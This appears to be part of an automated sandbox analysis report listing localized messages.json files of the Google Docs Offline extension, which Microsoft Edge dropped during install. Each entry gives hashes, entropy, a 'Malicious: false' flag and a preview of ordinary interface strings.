Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
